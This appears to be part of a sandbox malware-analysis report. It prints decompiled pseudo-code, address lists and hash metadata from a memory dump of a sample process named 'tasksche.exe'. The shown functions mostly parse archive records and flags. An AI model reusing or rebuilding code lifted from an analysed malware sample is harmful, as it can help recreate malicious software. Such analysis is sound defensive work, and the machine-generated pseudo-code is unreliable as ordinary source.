                                                                                              						_t312 =  *((intOrPtr*)(_t314 + 0x14)) - _t260;
                                                                                              						if(_t312 == 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						_t326 =  *(_t318 + 0x64);
                                                                                              						if(_t326 > 0 || _t326 >= 0 && _t142 > _t312) {
                                                                                              							break;
                                                                                              						} else {
                                                                                              							_t246 = _t260 + _t142;
                                                                                              							 *(_t318 + 0x78) = _t246;
                                                                                              							_t143 = E0040B60D(_t312);
                                                                                              							_t247 = _t246 -  *(_t314 + 0x18);
                                                                                              							 *(_t318 + 0x64) =  *(_t318 + 0x64) & 0x00000000;
                                                                                              							 *((intOrPtr*)(_t318 + 0x58)) = _t143;
                                                                                              							 *(_t318 + 0x5c) = _t312;
                                                                                              							if( *((intOrPtr*)(_t316 + 4)) == 1 && _t143 == 1 && _t312 == 0) {
                                                                                              								 *((char*)(_t316 + 0x1e)) = _t143;
                                                                                              								_t234 = E0040B60D(_t312);
                                                                                              								 *(_t318 + 0x74) = _t234;
                                                                                              								if((_t234 & 0x00000001) != 0) {
                                                                                              									_t239 = E0040B60D(_t312);
                                                                                              									 *(_t318 + 0x4c) = _t239;
                                                                                              									if((_t239 | _t312) != 0) {
                                                                                              										_t310 =  *((intOrPtr*)(_t318 + 0x68));
                                                                                              										asm("adc ecx, edx");
                                                                                              										 *((intOrPtr*)(_t316 + 0x20)) =  *((intOrPtr*)(_t310 + 0xb040)) +  *(_t318 + 0x4c);
                                                                                              										 *((intOrPtr*)(_t316 + 0x24)) =  *((intOrPtr*)(_t310 + 0xb044));
                                                                                              									}
                                                                                              								}
                                                                                              								if(( *(_t318 + 0x74) & 0x00000002) != 0) {
                                                                                              									_t235 = E0040B60D(_t312);
                                                                                              									 *(_t318 + 0x44) = _t235;
                                                                                              									if((_t235 | _t312) != 0) {
                                                                                              										_t307 =  *((intOrPtr*)(_t318 + 0x68));
                                                                                              										asm("adc ecx, edx");
                                                                                              										 *((intOrPtr*)(_t316 + 0x30)) =  *((intOrPtr*)(_t307 + 0xb040)) +  *(_t318 + 0x44);
                                                                                              										 *((intOrPtr*)(_t316 + 0x34)) =  *((intOrPtr*)(_t307 + 0xb044));
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							_t262 =  *((intOrPtr*)(_t316 + 4));
                                                                                              							if(_t262 == 2 || _t262 == 3) {
                                                                                              								_t312 = 0;
                                                                                              								_t339 =  *(_t318 + 0x5c);
                                                                                              								if(_t339 > 0 || _t339 >= 0 &&  *((intOrPtr*)(_t318 + 0x58)) > 7) {
                                                                                              									goto L81;
                                                                                              								} else {
                                                                                              									_t147 =  *((intOrPtr*)(_t318 + 0x58)) - 1;
                                                                                              									if(_t147 == 0) {
                                                                                              										_t148 = E0040B60D(_t312);
                                                                                              										__eflags = _t148;
                                                                                              										if(_t148 <= 0) {
                                                                                              											_t149 = E0040B60D(_t312);
                                                                                              											 *(_t316 + 0x10b1) = _t149 & 0x00000001;
                                                                                              											 *(_t316 + 0x10ba) = _t149 >> 0x00000001 & 0x00000001;
                                                                                              											_t153 = E0040B562(_t314) & 0x000000ff;
                                                                                              											 *(_t316 + 0x10dc) = _t153;
                                                                                              											__eflags = _t153 - 0x18;
                                                                                              											if(_t153 > 0x18) {
                                                                                              												E00401CA3( *((intOrPtr*)(_t318 + 0x68)), _t316 + 0x20);
                                                                                              											}
                                                                                              											E0040B696(_t314, _t316 + 0x1091, 0x10);
                                                                                              											E0040B696(_t314, _t316 + 0x10a1, 0x10);
                                                                                              											__eflags =  *(_t316 + 0x10b1);
                                                                                              											if( *(_t316 + 0x10b1) != 0) {
                                                                                              												_t248 = _t316 + 0x10b2;
                                                                                              												E0040B696(_t314, _t316 + 0x10b2, 8);
                                                                                              												E0040B696(_t314, _t318 + 0x54, 4);
                                                                                              												E004106AE(_t318 - 0x54);
                                                                                              												E004109B0(_t318 - 0x54, _t316 + 0x10b2, 8);
                                                                                              												E00410A29(_t314, _t312, __eflags, _t318 - 0x54, _t318 + 0x24);
                                                                                              												_t170 = E0041AC04(_t318 + 0x54, _t318 + 0x24, 4);
                                                                                              												_t320 = _t320 + 0xc;
                                                                                              												asm("sbb al, al");
                                                                                              												__eflags =  *((intOrPtr*)(_t316 + 4)) - 3;
                                                                                              												 *(_t316 + 0x10b1) =  ~_t170 + 1;
                                                                                              												if( *((intOrPtr*)(_t316 + 4)) == 3) {
                                                                                              													_t173 = E0041AC04(_t248, 0x42a49c, 8);
                                                                                              													_t320 = _t320 + 0xc;
                                                                                              													__eflags = _t173;
                                                                                              													if(_t173 == 0) {
                                                                                              														 *(_t316 + 0x10b1) = _t173;
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              											 *((char*)(_t316 + 0x1090)) = 1;
                                                                                              											 *((intOrPtr*)(_t316 + 0x108c)) = 5;
                                                                                              											 *((char*)(_t316 + 0x108b)) = 1;
                                                                                              										} else {
                                                                                              											E00401CA3( *((intOrPtr*)(_t318 + 0x68)), _t316 + 0x20);
                                                                                              										}
                                                                                              										goto L81;
                                                                                              									}
                                                                                              									_t178 = _t147 - 1;
                                                                                              									if(_t178 == 0) {
                                                                                              										_t179 = E0040B60D(_t312);
                                                                                              										__eflags = _t179;
                                                                                              										if(_t179 != 0) {
                                                                                              											goto L81;
                                                                                              										}
                                                                                              										_push(0x20);
                                                                                              										 *((intOrPtr*)(_t316 + 0x1060)) = 3;
                                                                                              										_push(_t316 + 0x1064);
                                                                                              										L33:
                                                                                              										E0040B696(_t314);
                                                                                              										goto L81;
                                                                                              									}
                                                                                              									_t182 = _t178 - 1;
                                                                                              									if(_t182 == 0) {
                                                                                              										__eflags =  *(_t318 + 0x64) - _t312;
                                                                                              										if(__eflags < 0) {
                                                                                              											goto L81;
                                                                                              										}
                                                                                              										if(__eflags > 0) {
                                                                                              											L58:
                                                                                              											_t183 = E0040B60D(_t312);
                                                                                              											_t250 = _t183 & 0x00000001;
                                                                                              											 *(_t318 + 0x77) = _t183;
                                                                                              											__eflags = _t183 & 0x00000002;
                                                                                              											if((_t183 & 0x00000002) != 0) {
                                                                                              												_t283 = _t314;
                                                                                              												__eflags = _t250;
                                                                                              												if(__eflags == 0) {
                                                                                              													E00411383(_t316 + 0x1030, E0040B5EC(_t283, __eflags), _t312);
                                                                                              												} else {
                                                                                              													E00411357(_t316 + 0x1030, _t312, E0040B5AF(_t283), 0);
                                                                                              												}
                                                                                              											}
                                                                                              											__eflags =  *(_t318 + 0x77) & 0x00000004;
                                                                                              											if(( *(_t318 + 0x77) & 0x00000004) != 0) {
                                                                                              												_t280 = _t314;
                                                                                              												__eflags = _t250;
                                                                                              												if(__eflags == 0) {
                                                                                              													E00411383(_t316 + 0x1038, E0040B5EC(_t280, __eflags), _t312);
                                                                                              												} else {
                                                                                              													E00411357(_t316 + 0x1038, _t312, E0040B5AF(_t280), 0);
                                                                                              												}
                                                                                              											}
                                                                                              											__eflags =  *(_t318 + 0x77) & 0x00000008;
                                                                                              											if(( *(_t318 + 0x77) & 0x00000008) != 0) {
                                                                                              												_t277 = _t314;
                                                                                              												__eflags = _t250;
                                                                                              												if(__eflags == 0) {
                                                                                              													E00411383(_t316 + 0x1040, E0040B5EC(_t277, __eflags), _t312);
                                                                                              												} else {
                                                                                              													E00411357(_t316 + 0x1040, _t312, E0040B5AF(_t277), 0);
                                                                                              												}
                                                                                              											}
                                                                                              											goto L81;
                                                                                              										}
                                                                                              										__eflags = _t247 - 9;
                                                                                              										if(_t247 < 9) {
                                                                                              											goto L81;
                                                                                              										}
                                                                                              										goto L58;
                                                                                              									}
                                                                                              									_t196 = _t182 - 1;
                                                                                              									if(_t196 == 0) {
                                                                                              										__eflags =  *(_t318 + 0x64) - _t312;
                                                                                              										if(__eflags < 0) {
                                                                                              											goto L81;
                                                                                              										}
                                                                                              										if(__eflags > 0) {
                                                                                              											L53:
                                                                                              											E0040B60D(_t312);
                                                                                              											__eflags = E0040B60D(_t312);
                                                                                              											if(__eflags != 0) {
                                                                                              												 *((char*)(_t316 + 0x10e3)) = 1;
                                                                                              												E0040BC16(_t318 + 0x1c, 0x14, ";%u", _t198);
                                                                                              												_t320 = _t320 + 0x10;
                                                                                              												E00410BC9(__eflags,  *((intOrPtr*)(_t318 + 0x68)) + 0x6608, _t318 + 0x1c, 0x800);
                                                                                              											}
                                                                                              											goto L81;
                                                                                              										}
                                                                                              										__eflags = _t247 - 1;
                                                                                              										if(_t247 < 1) {
                                                                                              											goto L81;
                                                                                              										}
                                                                                              										goto L53;
                                                                                              									}
                                                                                              									_t205 = _t196 - 1;
                                                                                              									if(_t205 == 0) {
                                                                                              										 *((intOrPtr*)(_t316 + 0x10f0)) = E0040B60D(_t312);
                                                                                              										_t207 = E0040B60D(_t312);
                                                                                              										_t290 = _t314;
                                                                                              										 *(_t316 + 0x20f4) = _t207 & 0x00000001;
                                                                                              										_t251 = E0040B60D(_t312);
                                                                                              										 *((char*)(_t318 - 0x2054)) = 0;
                                                                                              										__eflags = _t251 - 0x1fff;
                                                                                              										if(_t251 < 0x1fff) {
                                                                                              											_t290 = _t314;
                                                                                              											E0040B696(_t314, _t318 - 0x2054, _t251);
                                                                                              											 *((char*)(_t318 + _t251 - 0x2054)) = 0;
                                                                                              										}
                                                                                              										E0040A277(_t318 - 0x2054, _t318 - 0x2054, 0x2000);
                                                                                              										E00411CD1(_t290, _t318 - 0x2054, _t316 + 0x10f4, 0x800);
                                                                                              										goto L81;
                                                                                              									}
                                                                                              									_t217 = _t205 - 1;
                                                                                              									if(_t217 == 0) {
                                                                                              										_t218 = E0040B60D(_t312);
                                                                                              										 *(_t316 + 0x20f6) = _t218 >> 0x00000002 & 0x00000001;
                                                                                              										_t252 = _t316 + 0x20f8;
                                                                                              										 *(_t318 + 0x7c) = _t218;
                                                                                              										 *(_t316 + 0x20f7) = _t218 >> 0x00000003 & 0x00000001;
                                                                                              										 *((char*)(_t316 + 0x21f8)) = 0;
                                                                                              										 *_t252 = 0;
                                                                                              										__eflags = _t218 & 0x00000001;
                                                                                              										if((_t218 & 0x00000001) != 0) {
                                                                                              											 *(_t318 + 0x74) = E0040B60D(_t312);
                                                                                              											__eflags =  *(_t318 + 0x74) - 0xff;
                                                                                              											if( *(_t318 + 0x74) >= 0xff) {
                                                                                              												 *(_t318 + 0x74) = 0xff;
                                                                                              											}
                                                                                              											E0040B696(_t314, _t252,  *(_t318 + 0x74));
                                                                                              											 *((char*)(_t252 +  *(_t318 + 0x74))) = 0;
                                                                                              										}
                                                                                              										__eflags =  *(_t318 + 0x7c) & 0x00000002;
                                                                                              										if(( *(_t318 + 0x7c) & 0x00000002) != 0) {
                                                                                              											 *(_t318 + 0x74) = E0040B60D(_t312);
                                                                                              											__eflags =  *(_t318 + 0x74) - 0xff;
                                                                                              											if( *(_t318 + 0x74) >= 0xff) {
                                                                                              												 *(_t318 + 0x74) = 0xff;
                                                                                              											}
                                                                                              											_t253 = _t316 + 0x21f8;
                                                                                              											E0040B696(_t314, _t253,  *(_t318 + 0x74));
                                                                                              											 *((char*)(_t253 +  *(_t318 + 0x74))) = 0;
                                                                                              										}
                                                                                              										__eflags =  *(_t316 + 0x20f6);
                                                                                              										if( *(_t316 + 0x20f6) != 0) {
                                                                                              											 *((intOrPtr*)(_t316 + 0x22f8)) = E0040B60D(_t312);
                                                                                              										}
                                                                                              										__eflags =  *(_t316 + 0x20f7);
                                                                                              										if( *(_t316 + 0x20f7) != 0) {
                                                                                              											 *((intOrPtr*)(_t316 + 0x22fc)) = E0040B60D(_t312);
                                                                                              										}
                                                                                              										 *((char*)(_t316 + 0x20f5)) = 1;
                                                                                              										goto L81;
                                                                                              									}
                                                                                              									if(_t217 != 1) {
                                                                                              										goto L81;
                                                                                              									}
                                                                                              									if(_t262 == 3) {
                                                                                              										_t232 =  *((intOrPtr*)(_t314 + 0x14)) -  *(_t318 + 0x78);
                                                                                              										if(_t232 == 1) {
                                                                                              											_t247 = _t247 + _t232;
                                                                                              											asm("adc eax, edx");
                                                                                              										}
                                                                                              									}
                                                                                              									E00401C1D(_t316 + 0x1020, _t247);
                                                                                              									_push(_t247);
                                                                                              									_push( *((intOrPtr*)(_t316 + 0x1020)));
                                                                                              									goto L33;
                                                                                              								}
                                                                                              							} else {
                                                                                              								L81:
                                                                                              								 *(_t314 + 0x18) =  *(_t318 + 0x78);
                                                                                              								_t142 =  *((intOrPtr*)(_t314 + 0x14)) -  *(_t314 + 0x18);
                                                                                              								if(_t142 >= 2) {
                                                                                              									continue;
                                                                                              								}
                                                                                              								break;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}













































                                                                                              0x0040272e
                                                                                              0x0040272f
                                                                                              0x00402738
                                                                                              0x0040273e
                                                                                              0x00402741
                                                                                              0x00402744
                                                                                              0x00402749
                                                                                              0x0040274f
                                                                                              0x00402c84
                                                                                              0x00402c88
                                                                                              0x00402c88
                                                                                              0x00402757
                                                                                              0x0040275d
                                                                                              0x00402764
                                                                                              0x00402768
                                                                                              0x0040276a
                                                                                              0x00402773
                                                                                              0x00402776
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040277c
                                                                                              0x00402782
                                                                                              0x00402784
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040278c
                                                                                              0x0040278f
                                                                                              0x00000000
                                                                                              0x0040279f
                                                                                              0x0040279f
                                                                                              0x004027a4
                                                                                              0x004027a7
                                                                                              0x004027ac
                                                                                              0x004027af
                                                                                              0x004027b7
                                                                                              0x004027ba
                                                                                              0x004027bd
                                                                                              0x004027ca
                                                                                              0x004027cd
                                                                                              0x004027d2
                                                                                              0x004027d7
                                                                                              0x004027db
                                                                                              0x004027e0
                                                                                              0x004027e5
                                                                                              0x004027e7
                                                                                              0x004027f9
                                                                                              0x004027fb
                                                                                              0x004027fe
                                                                                              0x004027fe
                                                                                              0x004027e5
                                                                                              0x00402805
                                                                                              0x00402809
                                                                                              0x0040280e
                                                                                              0x00402813
                                                                                              0x00402815
                                                                                              0x00402827
                                                                                              0x00402829
                                                                                              0x0040282c
                                                                                              0x0040282c
                                                                                              0x00402813
                                                                                              0x00402805
                                                                                              0x0040282f
                                                                                              0x00402835
                                                                                              0x00402840
                                                                                              0x00402842
                                                                                              0x00402845
                                                                                              0x00000000
                                                                                              0x00402857
                                                                                              0x0040285a
                                                                                              0x0040285b
                                                                                              0x00402b57
                                                                                              0x00402b5c
                                                                                              0x00402b5e
                                                                                              0x00402b73
                                                                                              0x00402b7f
                                                                                              0x00402b89
                                                                                              0x00402b94
                                                                                              0x00402b97
                                                                                              0x00402b9d
                                                                                              0x00402ba0
                                                                                              0x00402ba9
                                                                                              0x00402ba9
                                                                                              0x00402bb9
                                                                                              0x00402bc9
                                                                                              0x00402bce
                                                                                              0x00402bd5
                                                                                              0x00402bd9
                                                                                              0x00402be2
                                                                                              0x00402bef
                                                                                              0x00402bf8
                                                                                              0x00402c04
                                                                                              0x00402c11
                                                                                              0x00402c20
                                                                                              0x00402c25
                                                                                              0x00402c2a
                                                                                              0x00402c2e
                                                                                              0x00402c32
                                                                                              0x00402c38
                                                                                              0x00402c42
                                                                                              0x00402c47
                                                                                              0x00402c4a
                                                                                              0x00402c4c
                                                                                              0x00402c4e
                                                                                              0x00402c4e
                                                                                              0x00402c4c
                                                                                              0x00402c38
                                                                                              0x00402c54
                                                                                              0x00402c5b
                                                                                              0x00402c65
                                                                                              0x00402b60
                                                                                              0x00402b67
                                                                                              0x00402b67
                                                                                              0x00000000
                                                                                              0x00402b5e
                                                                                              0x00402861
                                                                                              0x00402862
                                                                                              0x00402b30
                                                                                              0x00402b35
                                                                                              0x00402b37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402b3d
                                                                                              0x00402b45
                                                                                              0x00402b4f
                                                                                              0x004028b1
                                                                                              0x004028b3
                                                                                              0x00000000
                                                                                              0x004028b3
                                                                                              0x00402868
                                                                                              0x00402869
                                                                                              0x00402a68
                                                                                              0x00402a6b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402a71
                                                                                              0x00402a7c
                                                                                              0x00402a7e
                                                                                              0x00402a85
                                                                                              0x00402a88
                                                                                              0x00402a8b
                                                                                              0x00402a8d
                                                                                              0x00402a8f
                                                                                              0x00402a91
                                                                                              0x00402a93
                                                                                              0x00402ab7
                                                                                              0x00402a95
                                                                                              0x00402aa3
                                                                                              0x00402aa3
                                                                                              0x00402a93
                                                                                              0x00402abc
                                                                                              0x00402ac0
                                                                                              0x00402ac2
                                                                                              0x00402ac4
                                                                                              0x00402ac6
                                                                                              0x00402aea
                                                                                              0x00402ac8
                                                                                              0x00402ad6
                                                                                              0x00402ad6
                                                                                              0x00402ac6
                                                                                              0x00402aef
                                                                                              0x00402af3
                                                                                              0x00402af9
                                                                                              0x00402afb
                                                                                              0x00402afd
                                                                                              0x00402b24
                                                                                              0x00402aff
                                                                                              0x00402b0d
                                                                                              0x00402b0d
                                                                                              0x00402afd
                                                                                              0x00000000
                                                                                              0x00402af3
                                                                                              0x00402a73
                                                                                              0x00402a76
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402a76
                                                                                              0x0040286f
                                                                                              0x00402870
                                                                                              0x00402a07
                                                                                              0x00402a0a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402a10
                                                                                              0x00402a1b
                                                                                              0x00402a1d
                                                                                              0x00402a29
                                                                                              0x00402a2b
                                                                                              0x00402a3d
                                                                                              0x00402a44
                                                                                              0x00402a49
                                                                                              0x00402a5e
                                                                                              0x00402a5e
                                                                                              0x00000000
                                                                                              0x00402a2b
                                                                                              0x00402a12
                                                                                              0x00402a15
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402a15
                                                                                              0x00402876
                                                                                              0x00402877
                                                                                              0x00402996
                                                                                              0x0040299c
                                                                                              0x004029a3
                                                                                              0x004029a5
                                                                                              0x004029b0
                                                                                              0x004029b2
                                                                                              0x004029b9
                                                                                              0x004029bf
                                                                                              0x004029c9
                                                                                              0x004029cb
                                                                                              0x004029d0
                                                                                              0x004029d0
                                                                                              0x004029e5
                                                                                              0x004029fd
                                                                                              0x00000000
                                                                                              0x004029fd
                                                                                              0x0040287d
                                                                                              0x0040287e
                                                                                              0x004028bf
                                                                                              0x004028cc
                                                                                              0x004028da
                                                                                              0x004028e0
                                                                                              0x004028e3
                                                                                              0x004028e9
                                                                                              0x004028f0
                                                                                              0x004028f3
                                                                                              0x004028f5
                                                                                              0x004028fe
                                                                                              0x00402906
                                                                                              0x00402909
                                                                                              0x0040290b
                                                                                              0x0040290b
                                                                                              0x00402914
                                                                                              0x0040291c
                                                                                              0x0040291c
                                                                                              0x00402920
                                                                                              0x00402924
                                                                                              0x0040292d
                                                                                              0x00402935
                                                                                              0x00402938
                                                                                              0x0040293a
                                                                                              0x0040293a
                                                                                              0x00402940
                                                                                              0x00402949
                                                                                              0x00402951
                                                                                              0x00402951
                                                                                              0x00402955
                                                                                              0x0040295c
                                                                                              0x00402965
                                                                                              0x00402965
                                                                                              0x0040296b
                                                                                              0x00402972
                                                                                              0x0040297b
                                                                                              0x0040297b
                                                                                              0x00402981
                                                                                              0x00000000
                                                                                              0x00402981
                                                                                              0x00402881
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040288a
                                                                                              0x0040288f
                                                                                              0x00402895
                                                                                              0x00402897
                                                                                              0x0040289c
                                                                                              0x0040289c
                                                                                              0x00402895
                                                                                              0x004028a5
                                                                                              0x004028aa
                                                                                              0x004028ab
                                                                                              0x00000000
                                                                                              0x004028ab
                                                                                              0x00402c6c
                                                                                              0x00402c6c
                                                                                              0x00402c6f
                                                                                              0x00402c75
                                                                                              0x00402c7b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402c7b
                                                                                              0x00402835
                                                                                              0x0040278f
                                                                                              0x00402c82

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _swprintf
                                                                                              • String ID: ;%u
                                                                                              • API String ID: 589789837-535004727
                                                                                              • Opcode ID: 8d6632be75e15c05decfb529c35803f2aea70f16b1fc9be6edc689b65e1f5e46
                                                                                              • Instruction ID: 268b90de5ef8301e543b0e1450f18e5b796866e9caf2f0e9a7a428077d8a2ebb
                                                                                              • Opcode Fuzzy Hash: 8d6632be75e15c05decfb529c35803f2aea70f16b1fc9be6edc689b65e1f5e46
                                                                                              • Instruction Fuzzy Hash: ADE114702007445ADB24EF75C699BEE77E5AF40304F04053FE996A72C2DBBCA984CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E00416790(void* __ecx, void* __edx) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t176;
                                                                                              				signed int _t179;
                                                                                              				signed int _t180;
                                                                                              				void* _t181;
                                                                                              				signed int _t184;
                                                                                              				signed int _t185;
                                                                                              				signed int _t190;
                                                                                              				signed int _t194;
                                                                                              				signed int _t195;
                                                                                              				intOrPtr _t196;
                                                                                              				signed int _t197;
                                                                                              				signed int _t203;
                                                                                              				signed int _t215;
                                                                                              				signed int _t248;
                                                                                              				signed int _t250;
                                                                                              				intOrPtr* _t263;
                                                                                              				signed int _t264;
                                                                                              				signed int* _t266;
                                                                                              				signed int _t267;
                                                                                              				signed int* _t268;
                                                                                              				signed int* _t269;
                                                                                              				intOrPtr* _t270;
                                                                                              				signed int _t272;
                                                                                              				signed int _t273;
                                                                                              				signed int _t274;
                                                                                              				intOrPtr _t281;
                                                                                              				signed int* _t310;
                                                                                              				void* _t319;
                                                                                              				signed int _t321;
                                                                                              				signed int* _t328;
                                                                                              				signed int _t329;
                                                                                              				void* _t330;
                                                                                              				void* _t332;
                                                                                              				signed int _t334;
                                                                                              				signed int _t335;
                                                                                              				void* _t338;
                                                                                              				signed int _t340;
                                                                                              				signed int _t342;
                                                                                              				void* _t343;
                                                                                              				void* _t345;
                                                                                              				void* _t346;
                                                                                              				void* _t347;
                                                                                              				void* _t349;
                                                                                              
                                                                                              				_t319 = __edx;
                                                                                              				E0041A4DC(E0042981F, _t343);
                                                                                              				_t346 = _t345 - 0x24;
                                                                                              				_t332 = __ecx;
                                                                                              				_t263 = __ecx + 0xe694;
                                                                                              				_t176 = 0x8000;
                                                                                              				 *((intOrPtr*)(_t343 - 0x10)) = _t263;
                                                                                              				 *((intOrPtr*)(_t263 + 4)) = 0;
                                                                                              				 *_t263 = 0;
                                                                                              				if( *(_t343 + 0x10) <= 0x8000) {
                                                                                              					_t176 =  *(_t343 + 0x10);
                                                                                              				}
                                                                                              				E0041C290(_t263, 0, _t332,  *((intOrPtr*)(_t332 + 0xe6a0)),  *(_t343 + 0xc), _t176);
                                                                                              				_t347 = _t346 + 0xc;
                                                                                              				 *((intOrPtr*)(_t343 - 0x14)) = _t332 + 0xe65c;
                                                                                              				E0040AB32(_t332 + 0xe65c);
                                                                                              				_t352 =  *(_t343 + 8) & 0x00000080;
                                                                                              				if(( *(_t343 + 8) & 0x00000080) == 0) {
                                                                                              					_t179 =  *(_t332 + 0xe6d4);
                                                                                              					 *(_t343 + 0xc) = _t179;
                                                                                              					_t264 = _t179;
                                                                                              				} else {
                                                                                              					_t264 = E0040AB58(_t352, _t263);
                                                                                              					 *(_t343 + 0xc) = _t264;
                                                                                              					if(_t264 != 0) {
                                                                                              						_t264 = _t264 - 1;
                                                                                              						 *(_t343 + 0xc) = _t264;
                                                                                              					} else {
                                                                                              						E004152CD(_t332, 0);
                                                                                              					}
                                                                                              				}
                                                                                              				_t180 =  *(_t332 + 0xe6a8);
                                                                                              				if(_t264 > _t180 || _t264 >  *((intOrPtr*)(_t332 + 0xe6c8))) {
                                                                                              					L16:
                                                                                              					_t181 = 0;
                                                                                              					goto L17;
                                                                                              				} else {
                                                                                              					_push(0x70);
                                                                                              					 *(_t332 + 0xe6d4) = _t264;
                                                                                              					 *((char*)(_t343 + 0x13)) = _t264 == _t180;
                                                                                              					_t328 = E0041A89A(_t264, _t319, 0, _t264 - _t180);
                                                                                              					if(_t328 == 0) {
                                                                                              						_t328 = 0;
                                                                                              						__eflags = 0;
                                                                                              					} else {
                                                                                              						_t21 =  &(_t328[5]); // 0x14
                                                                                              						E004156C4(_t21);
                                                                                              					}
                                                                                              					if( *((char*)(_t343 + 0x13)) == 0) {
                                                                                              						_t184 =  *( *((intOrPtr*)(_t332 + 0xe6a4)) + _t264 * 4);
                                                                                              						_t328[4] = _t264;
                                                                                              						_t266 = _t184 + 8;
                                                                                              						 *_t266 =  *_t266 + 1;
                                                                                              						__eflags =  *_t266;
                                                                                              						 *(_t343 - 0x1c) = _t184;
                                                                                              						goto L23;
                                                                                              					} else {
                                                                                              						if(_t264 <= 0x2000) {
                                                                                              							E004129F9(_t332 + 0xe6a4, 1);
                                                                                              							_push(0x70);
                                                                                              							_t274 = E0041A89A(_t264, _t319, _t328, __eflags);
                                                                                              							__eflags = _t274;
                                                                                              							if(_t274 == 0) {
                                                                                              								_t274 = 0;
                                                                                              								__eflags = 0;
                                                                                              							} else {
                                                                                              								_t25 = _t274 + 0x14; // 0x14
                                                                                              								E004156C4(_t25);
                                                                                              							}
                                                                                              							 *( *((intOrPtr*)(_t332 + 0xe6a4)) +  *(_t332 + 0xe6a8) * 4 - 4) = _t274;
                                                                                              							 *(_t343 - 0x1c) = _t274;
                                                                                              							_t328[4] =  *(_t332 + 0xe6a8) - 1;
                                                                                              							E004148ED(_t332 + 0xe6c4, 0);
                                                                                              							_t266 = _t274 + 8;
                                                                                              							 *_t266 =  *_t266 & 0x00000000;
                                                                                              							L23:
                                                                                              							_t185 = 0;
                                                                                              							 *(_t343 - 0x18) = 0;
                                                                                              							 *(_t343 - 0x20) = 0;
                                                                                              							__eflags =  *(_t332 + 0xe6b8);
                                                                                              							if( *(_t332 + 0xe6b8) <= 0) {
                                                                                              								L30:
                                                                                              								__eflags =  *(_t332 + 0xe6b8) - 0x2000;
                                                                                              								if( *(_t332 + 0xe6b8) > 0x2000) {
                                                                                              									goto L16;
                                                                                              								}
                                                                                              								E004129F9(_t332 + 0xe6b4, 1);
                                                                                              								_t321 = 1;
                                                                                              								__eflags = 1;
                                                                                              								L32:
                                                                                              								 *( *((intOrPtr*)(_t332 + 0xe6b4)) + ( *(_t332 + 0xe6b8) - _t321) * 4) = _t328;
                                                                                              								_t328[2] =  *_t266;
                                                                                              								_t190 = E0040AB58(__eflags,  *((intOrPtr*)(_t343 - 0x10)));
                                                                                              								__eflags =  *(_t343 + 8) & 0x00000040;
                                                                                              								_t267 = _t190;
                                                                                              								if(( *(_t343 + 8) & 0x00000040) != 0) {
                                                                                              									_t267 = _t267 + 0x102;
                                                                                              									__eflags = _t267;
                                                                                              								}
                                                                                              								__eflags =  *(_t343 + 8) & 0x00000020;
                                                                                              								 *_t328 =  *((intOrPtr*)(_t332 + 0x70)) + _t267 &  *(_t332 + 0xe6dc);
                                                                                              								if(__eflags == 0) {
                                                                                              									_t194 =  *(_t343 + 0xc);
                                                                                              									__eflags = _t194 -  *((intOrPtr*)(_t332 + 0xe6c8));
                                                                                              									if(_t194 >=  *((intOrPtr*)(_t332 + 0xe6c8))) {
                                                                                              										_t195 = 0;
                                                                                              										__eflags = 0;
                                                                                              									} else {
                                                                                              										_t195 =  *( *((intOrPtr*)(_t332 + 0xe6c4)) + _t194 * 4);
                                                                                              									}
                                                                                              									_t328[1] = _t195;
                                                                                              								} else {
                                                                                              									_t248 = E0040AB58(__eflags,  *((intOrPtr*)(_t343 - 0x10)));
                                                                                              									_t328[1] = _t248;
                                                                                              									 *( *((intOrPtr*)(_t332 + 0xe6c4)) +  *(_t343 + 0xc) * 4) = _t248;
                                                                                              								}
                                                                                              								_t196 =  *((intOrPtr*)(_t332 + 0x74));
                                                                                              								_t281 =  *((intOrPtr*)(_t332 + 0x70));
                                                                                              								__eflags = _t196 - _t281;
                                                                                              								if(_t196 == _t281) {
                                                                                              									L43:
                                                                                              									_t197 = 0;
                                                                                              									__eflags = 0;
                                                                                              									goto L44;
                                                                                              								} else {
                                                                                              									__eflags = (_t196 - _t281 &  *(_t332 + 0xe6dc)) - _t267;
                                                                                              									if((_t196 - _t281 &  *(_t332 + 0xe6dc)) > _t267) {
                                                                                              										goto L43;
                                                                                              									}
                                                                                              									_t197 = 1;
                                                                                              									L44:
                                                                                              									_t91 =  &(_t328[0x13]); // 0x4c
                                                                                              									_t268 = _t91;
                                                                                              									_t328[3] = _t197;
                                                                                              									E0041A820(_t328, _t268, 0, 0x1c);
                                                                                              									_t328[0x17] = _t328[1];
